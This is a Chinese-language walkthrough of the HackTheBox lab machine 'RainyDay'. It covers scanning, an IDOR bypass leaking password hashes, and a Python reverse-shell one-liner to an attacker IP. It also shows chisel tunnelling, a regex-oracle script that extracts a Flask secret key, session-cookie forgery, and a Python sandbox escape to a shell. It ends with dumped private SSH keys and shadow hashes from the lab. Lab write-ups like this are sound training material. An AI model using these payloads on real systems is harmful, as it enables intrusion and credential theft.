RainyDay - HackTheBox

基本信息

• https://www.hackthebox.com/home/machines/profile/502

• 10.10.11.184

端口扫描

22和80:

$ nmap -sC -sV -Pn 10.10.11.184
Starting Nmap 7.93 ( https://nmap.org ) at 2022-10-18 13:01 CST
Nmap scan report for 10.10.11.184
Host is up (0.21s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   256 48dde361dc5d5878f881dd6172fe6581 (ECDSA)
|_  256 adbf0bc8520f49a9a0ac682a2525cd6d (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://rainycloud.htb
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 77.90 seconds

80

需要加hosts,一个hosting service：

10.10.11.184 rainycloud.htb

注册功能不可用，登录错误时源码中提示信息，知道路径和后端使用python：

子域名扫描

子域名可以发现一个dev,响应403：

ffuf -w ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt:FUZZ -u "http://rainycloud.htb/" -H 'Host: FUZZ.rainycloud.htb' -fs 229

dev                     [Status: 403, Size: 26, Words: 5, Lines: 1, Duration: 264ms]

目录扫描

目录扫描发现api：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://rainycloud.htb

/api                  (Status: 308) [Size: 239] [--> http://rainycloud.htb/api/]
/login                (Status: 200) [Size: 3254]
/logout               (Status: 302) [Size: 189] [--> /]
/new                  (Status: 302) [Size: 199] [--> /login]
/register             (Status: 200) [Size: 3686]

api/user

能发现应该是存在3个用户，但直接访问提示不允许查看其他用户信息，简单的绕过：

gobuster dir -w ~/Tools/dict/SecLists/Discovery/Web-Content/common.txt  -t 50 -u http://rainycloud.htb/api/user/ --exclude-length 3

/01                   (Status: 200) [Size: 50]
/03                   (Status: 200) [Size: 50]
/1                    (Status: 200) [Size: 50]
/02                   (Status: 200) [Size: 50]
/2                    (Status: 200) [Size: 50]
/3                    (Status: 200) [Size: 50]

$ curl "http://rainycloud.htb/api/user/1"
{"Error":"Not allowed to view other users info!"}

$ curl "http://rainycloud.htb/api/user/1.0"
{"id":1,"password":"$2a$10$bit.DrTClexd4.wVpTQYb.FpxdGFNPdsVX8fjFYknhDwSxNJh.O.O","username":"jack"}

{"id":2,"password":"$2a$05$x4nSvCqGHZBmBQnmNM2nXeWDzVvvsXaJiHsSv1pwZnxrcBFbOibZS","username":"root"}
{"id":3,"password":"$2b$12$WTik5.ucdomZhgsX6U/.meSgr14LcpWXsCA0KxldEw8kksUtDuAuG","username":"gary"}

hash crack

得到的三条hash进行破解，能解出来gary的密码：

sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

rubberducky      (?)

Containers

得到的账号密码登录，创建一个容器，容器中运行任意命令，得到容器shell：

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.15",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'

chisel

前面的结果发现有dev子域名，外部访问是403，考虑打通隧道后访问：

# local
./chisel_1.7.0-rc7_darwin_amd64 server -p 9999 --reverse

# 容器内
wget http://10.10.14.15:7777/chisel_1.7.6_linux_amd64
chmod +x chisel_1.7.6_linux_amd64
./chisel_1.7.6_linux_amd64 client --max-retry-count=1 10.10.14.15:9999 R:8888:172.18.0.1:80

然后添加hosts：

127.0.0.1     dev.rainycloud.htb

然后可以访问到dev：

dev.rainycloud.htb

dev也有一些api，其中有一个healthcheck：

healthcheck

这个接口支持post请求，需要的参数根据前面得到的响应构造：

很明显是提供正则匹配对应文件内容，结果为true和false，那就可以fuzz出任意文件内容了

SECRET_KEY

根据前面的信息可以知道是python，所以fuzz SECRET_KEY：

file=/var/www/rainycloud/FUZZ.py&type=custom&pattern=^SECRET_KEY.*'

fuzz出内容：

f77dd59f50ba412fcfbd3e653f8f3f2ca97224dd53cf6304b4c86658a75d8f67

file_fuzz.py

import string
import requests
import json

allchars = string.printable
cookies = {'session': 'session_cookie'}

s = requests.Session()
pattern = ""

while True:
    for c in allchars:
        try:
            rsp = s.post('http://dev.rainycloud.htb:8888/api/healthcheck', {
                'file': '/var/www/rainycloud/secrets.py',
                'type': 'custom',
                'pattern': "^SECRET_KEY = '" + pattern + c + ".*"
            }, cookies=cookies)
            if json.loads(rsp.content)['result']:
                pattern += c
                print(pattern)
                break
            else:
                print(c)
        except Exception:
            print(rsp.content)

jack secrets

有了secret，就可以伪造任意ookie了，直接修改为前面得到的另一个用户jack：

flask-unsign --sign --cookie "{'username': 'jack'}" --secret 'f77dd59f50ba412fcfbd3e653f8f3f2ca97224dd53cf6304b4c86658a75d8f67'

eyJ1c2VybmFtZSI6ImphY2sifQ.Y05Gog.GRPXrP7KBA6mP1OiM9H9cWyiWFk

替换cookie，可以看到jack用户的secrets容器：

同样的方法拿到这个容器shell,查看进程发现一个sleep，这个进程有一个挂载，得到jack的私钥：

jack_id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

user flag

jack ssh 私钥登录：

jack_adm

jack可以以jack_adm身份运行指定程序,看名字就知道是python沙盒逃逸类型：

沙盒逃逸

• The Craziest Python Sandbox Escape | Reelix’s Site of Stuff
  https://www.reelix.za.net/2021/04/the-craziest-python-sandbox-escape.html

().__class__.__mro__[1].__subclasses__()[144] -> warnings.catch_warnings

echo 'print(().__class__.__mro__[1].__subclasses__()[144].__init__.__globals__["__builtins__"]["__loader__"]().load_module("builtins").__import__("os").system("whoami"))' > /tmp/test && sudo -u jack_adm /usr/bin/safe_python /tmp/test

echo 'print(().__class__.__mro__[1].__subclasses__()[144].__init__.__globals__["__builtins__"]["__loader__"]().load_module("builtins").__import__("os").system("bash -i"))' > /tmp/test && sudo -u jack_adm /usr/bin/safe_python /tmp/test

提权信息

只有一个看起来是指定密码加salt后生成hash的程序，密码为空得到的hash破解出来salt,使用salt生成新字典破解前面在api/user那里得到的root hash：

sudo john --wordlist=/usr/share/seclists/Passwords/Leaked-Databases/md5decryptor-uk.txt

Sup3rDup3r

sed 's/$/Sup3rDup3r/' /usr/share/wordlists/rockyou.txt > newrockyou.txt

sudo john --wordlist=newrockyou.txt hash.txt

246813579Sup3rDup3r

root flag

破解出来的密码切到root：

(这个box太CTF了)

shadow

root:$y$j9T$5SIveCET7DEtfdvKf0xbB1$XK4FfV4Ud4KKP3tJGSpYrYQDFofln6ZOP3jbd2O1mL6:19256:0:99999:7:::
jack:$y$j9T$ldTcnggvK0yHbGNv0.aKi0$vpHrVNFy1sfJecOtDaaQiKK8Da2AFG7fYUyJwDC5Gg0:19131:0:99999:7:::
jack_adm:$y$j9T$6eiMKhY4J8eSrAtVSP44K0$U6UClG5Inrs5fAtJQy3gjZJ99YGd.7VocPcWs.78C25:19147:0:99999:7:::

root_id_rsa

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

参考资料

• The Craziest Python Sandbox Escape | Reelix’s Site of Stuff
  https://www.reelix.za.net/2021/04/the-craziest-python-sandbox-escape.html
• RainyDay - HTB [Discussion] | BreachForums
  https://breached.to/Thread-RainyDay-HTB-Discussion
• HackTheBox (HTB) Writeup: RainyDay [Hard] – meowmeowattack
  https://meowmeowattack.wordpress.com/2022/10/18/hackthebox-htb-writeup-rainyday/